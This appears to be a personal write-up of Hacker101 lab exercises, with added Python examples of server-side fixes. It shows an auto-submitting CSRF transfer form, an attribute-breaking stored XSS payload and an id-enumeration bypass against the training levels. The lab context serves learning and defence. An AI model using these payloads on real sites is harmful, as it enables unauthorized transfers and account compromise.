Jason Sheh

Hacker101 Coursework (1)


0xff Introduction
HackerOne, the well-known bug bounty platform, has just launched an online web security learning site, hacker101. The course is fairly basic but covers a lot of ground. What interests me, of course, are the 9 course exercises at the end :)

0x00 Level 0: Breakerbank
In this exercise, you’re presented with a bank account interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: A logic flaw in the application will give you a sample report for one of the bugs, giving you a nice template to work from.

Look at the source first; it tells us there are 4 vulnerabilities in total.
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Reflected XSS
Authorization Bypass/Direct Object Reference
Have fun!

  • CSRF

    The transfer is submitted directly by a POST form in the HTML, so the request can be built locally:

    <!-- the form is submitted automatically as soon as the page loads -->
    <body onload="javascript:csrf()"></body>
    <script type="text/javascript">
    function csrf(){
        document.getElementById("button").click();
    }
    </script>
    <form action="https://levels-a.hacker101.com/levels/0/" method="POST">
    <input type="text" name="from" value="1">
    <input type="text" name="to" value="588">
    <input type="text" name="amount" value="1000000">
    <input id="button" type="submit" value="Transfer">
    </form>

  • Authorization bypass

    Adding a from field of your own to the form lets you choose who the transfer is sent from.

    Combined with CSRF, the result looks like this:

  • Reflected XSS
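How the two Level 0 bugs above are closed on the server side, as an added example (not the author's code and not Hacker101's own implementation): the sender of a transfer is taken from the logged-in session instead of a from field, and every state-changing POST must carry a per-session CSRF token that is compared in constant time. The account table, session object and handler names are assumptions constructed for the example.

```python
import hmac
import secrets

# Constructed in-memory state standing in for the bank's account table.
# Assumption: the real application keeps this server-side, per user.
ACCOUNTS = {1: 5000, 588: 0, 7: 250}


class SessionState:
    """A logged-in user's server-side session (constructed for the example)."""

    def __init__(self, user_id: int):
        self.user_id = user_id
        # Unpredictable token issued once per session and stored server-side;
        # a guessable scheme such as md5 of something known is not enough.
        self.csrf_token = secrets.token_hex(32)


def render_transfer_form(session: SessionState) -> str:
    """Emit the transfer form with the session's token as a hidden field.
    Note there is no 'from' field: the sender is not client-controlled."""
    return (
        '<form method="POST" action="/levels/0/">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input type="text" name="to">'
        '<input type="text" name="amount">'
        '<input type="submit" value="Transfer">'
        '</form>'
    )


def handle_transfer(session: SessionState, form: dict) -> str:
    """Process POST /levels/0/ and return a status string."""
    # CSRF: the submitted token must match the one bound to this session.
    # compare_digest avoids leaking how many leading bytes matched.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return "bad token"

    # Authorization: the sender is the authenticated user. Any 'from' value
    # the client sends is ignored, which removes the direct-object bypass.
    sender = session.user_id

    try:
        to = int(form.get("to", ""))
        amount = int(form.get("amount", ""))
    except ValueError:
        return "invalid input"
    if amount <= 0 or to not in ACCOUNTS or to == sender:
        return "invalid transfer"
    if ACCOUNTS[sender] < amount:
        return "insufficient funds"

    ACCOUNTS[sender] -= amount
    ACCOUNTS[to] += amount
    return "ok"


if __name__ == "__main__":
    s = SessionState(user_id=7)
    # A forged cross-site POST has no way to know s.csrf_token.
    print(handle_transfer(s, {"from": "1", "to": "588", "amount": "100"}))
    # The legitimate form carries the token, and 'from' is still ignored.
    print(handle_transfer(s, {"csrf_token": s.csrf_token, "from": "1",
                              "to": "588", "amount": "100"}))
    print(ACCOUNTS)
```

The same token design answers the Level 1 question about weak tokens: the token's strength comes from being unpredictable and bound to the session, not from its length or from looking like a hash.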

0x01 Level 1: Breakbook
In this exercise, you’re presented with a simple social network. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Pay attention to the first message posted.
Go and find the vulnerabilities in the social network.

Again, look at the source first; again there are four vulnerabilities.
In this level, there are 4 vulnerabilities, falling into the following classes:
CSRF
Stored XSS
Forced Browsing
Have fun!

  • Stored XSS

    At first glance it is obviously going to be in the message box, but the page notes that HTML is not allowed while links are clickable. Posting a crafted URL makes the site generate the corresponding tag automatically, so XSS can be injected:

    <tr>
        <td><img src="/favicon.png" width="64" height="64"></td>
        <td>qq3039344</td>
        <td><a href="http://test.com/"/onmouseover="alert(1)">http://test.com/"/onmouseover="alert(1)</a></td>
        <td><a href="post?id=247">Permalink</a></td>
    </tr>

  • Enumeration (forced browsing)

    The link to my own post is
    https://levels-a.hacker101.com/levels/1/post?id=247
    Changing the value of id lets you view other people's posts.

  • CSRF

    I felt there was something slightly off with this level. There is a CSRF token, so there should be no CSRF vulnerability, but the token generation algorithm is far too simple (MD5()), so a token can easily be constructed and CSRF is still present. However, no matter whose token I swapped in, as long as it was a 32-character hash the post showed as sent by me; anything else showed bad token and could not be sent.

    I'm not sure about this; I don't know whether the level is broken or my reasoning is wrong.
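For the two Level 1 bugs that are clear-cut, here is an added example of the server-side fixes (my own illustration, not the author's code or Hacker101's implementation). linkify renders a message by escaping everything and then wrapping http(s) URLs in an anchor whose href is attribute-escaped, so a double quote in the URL cannot terminate the attribute the way the row above shows. get_post does the authorization check in the same place as the lookup, so changing ?id= is not enough to read someone else's post. The post table, friend list and function names are assumptions constructed for the example.

```python
import html
import re

# Matches a bare http(s) URL in message text; it stops at whitespace or angle
# brackets, which is where ordinary message text resumes.
URL_RE = re.compile(r"https?://[^\s<>]+")


def linkify(message: str) -> str:
    """Render an untrusted message as HTML with clickable links.

    Every piece of text is HTML-escaped. Matched URLs additionally get
    quote=True escaping so that '"' becomes '&quot;' inside the href
    attribute and cannot open a new attribute such as onmouseover.
    """
    out = []
    pos = 0
    for m in URL_RE.finditer(message):
        out.append(html.escape(message[pos:m.start()]))
        safe_url = html.escape(m.group(0), quote=True)
        out.append(f'<a href="{safe_url}" rel="noopener noreferrer">{safe_url}</a>')
        pos = m.end()
    out.append(html.escape(message[pos:]))
    return "".join(out)


# Constructed data standing in for the social network's post table and
# friend relationships (assumption: the real app stores these in a database).
POSTS = {
    247: {"author": "qq3039344", "visibility": "friends", "body": "hello"},
    246: {"author": "alice", "visibility": "public", "body": "hi all"},
    245: {"author": "bob", "visibility": "friends", "body": "private"},
}
FRIENDS = {"qq3039344": {"alice"}, "alice": {"qq3039344"}, "bob": set()}


def get_post(viewer: str, post_id: int):
    """Return the post only if the viewer may see it, else None.

    A post the viewer is not allowed to read is answered exactly like a post
    that does not exist, so walking id values reveals nothing.
    """
    post = POSTS.get(post_id)
    if post is None:
        return None
    allowed = (
        post["visibility"] == "public"
        or post["author"] == viewer
        or viewer in FRIENDS.get(post["author"], set())
    )
    return post if allowed else None


if __name__ == "__main__":
    print(linkify('http://test.com/"/onmouseover="alert(1)'))
    print(get_post("qq3039344", 247))
    print(get_post("bob", 247))
```

Escaping alone would not make the anchor safe if the URL scheme were left open (the regex here only ever matches http and https); the two measures together are what keep the rendered row inert.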

0x02 Level 2: Breaker Profile

In this exercise, you’re presented with a profile management and viewing interface. There are many instances of the bugs we’ve discussed so far, along with some that we haven’t yet talked about.
Hint: Think about what we learned about special handling with respect to XSS.

Profile management.
A full seven vulnerabilities this time. In this level, there are 7 vulnerabilities, falling into the following classes:
Stored XSS
Reflected XSS
Unrelated Bonus
Have fun!

  • XSS-1

    In the avatar field, appending a .jpg suffix gets past the image check.

  • XSS-2

    In the font colour field, anything at all can be entered.

  • XSS-3 (reflected)

    I give up... where are there 7 vulnerabilities, and what on earth does "Unrelated Bonus" mean??? :(
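Both Level 2 stored XSS bugs above come from the same mistake: the profile fields are checked by what the value ends with or looks like rather than by what it is. As an added example (my own code, not the author's or Hacker101's), the avatar URL is validated by structure (absolute http(s) URL or site-relative path, never by a .jpg suffix) and the colour by an allowlist of hex and named colours, and the values are still attribute-encoded when rendered. The default avatar path, the named-colour set and the function names are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import urlsplit

DEFAULT_AVATAR = "/favicon.png"   # assumed fallback image
HEX_COLOR_RE = re.compile(r"^#(?:[0-9a-f]{3}|[0-9a-f]{6})$")
NAMED_COLORS = {"black", "white", "red", "green", "blue", "gray", "orange", "purple"}


def safe_avatar_src(value: str) -> str:
    """Accept only an absolute http(s) URL or a site-relative path.

    The decision is made on the URL's structure, so a trailing '.jpg' on
    an otherwise unacceptable value (another scheme, a bare string) does
    not satisfy it. Anything else falls back to the default avatar.
    """
    value = value.strip()
    if not value:
        return DEFAULT_AVATAR
    parts = urlsplit(value)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
            return DEFAULT_AVATAR
        return value
    # No scheme: allow a single-slash site-relative path only
    # ('//host/...' would be protocol-relative and is refused).
    if value.startswith("/") and not value.startswith("//"):
        return value
    return DEFAULT_AVATAR


def safe_color(value: str) -> str:
    """Allowlist a CSS colour value; anything else becomes black."""
    v = value.strip().lower()
    if HEX_COLOR_RE.match(v) or v in NAMED_COLORS:
        return v
    return "black"


def render_profile(name: str, avatar: str, color: str) -> str:
    """Render the profile row with validation plus attribute encoding."""
    src = html.escape(safe_avatar_src(avatar), quote=True)
    return (
        f'<img src="{src}" width="64" height="64">'
        f'<span style="color: {safe_color(color)}">{html.escape(name)}</span>'
    )


if __name__ == "__main__":
    print(render_profile("qq3039344", "data:,x.jpg", "red; background:url(x)"))
    print(render_profile("qq3039344", "/uploads/me.jpg", "#FF0000"))
```

Validation and encoding are deliberately separate steps: the allowlist decides which values are acceptable at all, and html.escape with quote=True guarantees that even an accepted site-relative path containing a quote stays inside the src attribute.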